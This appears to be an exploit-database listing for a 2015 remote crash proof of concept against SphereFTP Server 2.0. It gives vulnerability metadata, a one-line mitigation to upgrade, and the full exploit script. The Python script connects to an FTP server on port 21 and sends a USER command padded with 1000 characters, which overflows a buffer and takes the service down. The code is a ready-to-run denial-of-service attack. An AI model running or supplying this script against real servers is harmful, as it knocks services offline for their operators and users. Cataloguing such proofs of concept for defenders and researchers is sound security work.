header-logo
Suggest Exploit
vendor:
SphereFTP
by:
Meisam Monsef
7,5
CVSS
HIGH
Remote Crash
119
CWE
Product Name: SphereFTP
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: YES
Related CWE: N/A
CPE: a:menasoft:sphereftp:2.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Microsoft Windows XP Professional SP3
2015

SphereFTP Server v2.0 Remote Crash PoC

A buffer overflow vulnerability exists in SphereFTP Server v2.0 when a long string is sent to the FTP server. An attacker can exploit this vulnerability to crash the FTP server.

Mitigation:

Upgrade to the latest version of SphereFTP Server
Source

Exploit-DB raw data:

#!/usr/bin/python
# Exploit Title: SphereFTP Server v2.0 Remote Crash PoC
# Date: 2015-09-02
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage: http://www.menasoft.com/blog/?p=32
# Software Link: http://www.menasoft.com/sphereftp/sphereftp_win32_v20.zip
# Version: 2.0
# Tested on: Microsoft Windows XP Professional SP3

import socket
target = '192.168.0.166'
exploit = "A" * 1000
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((target,21))
s.send("USER "+exploit+"\r\n")
s.close()

Navigation

Suggest Exploit

Services By CQR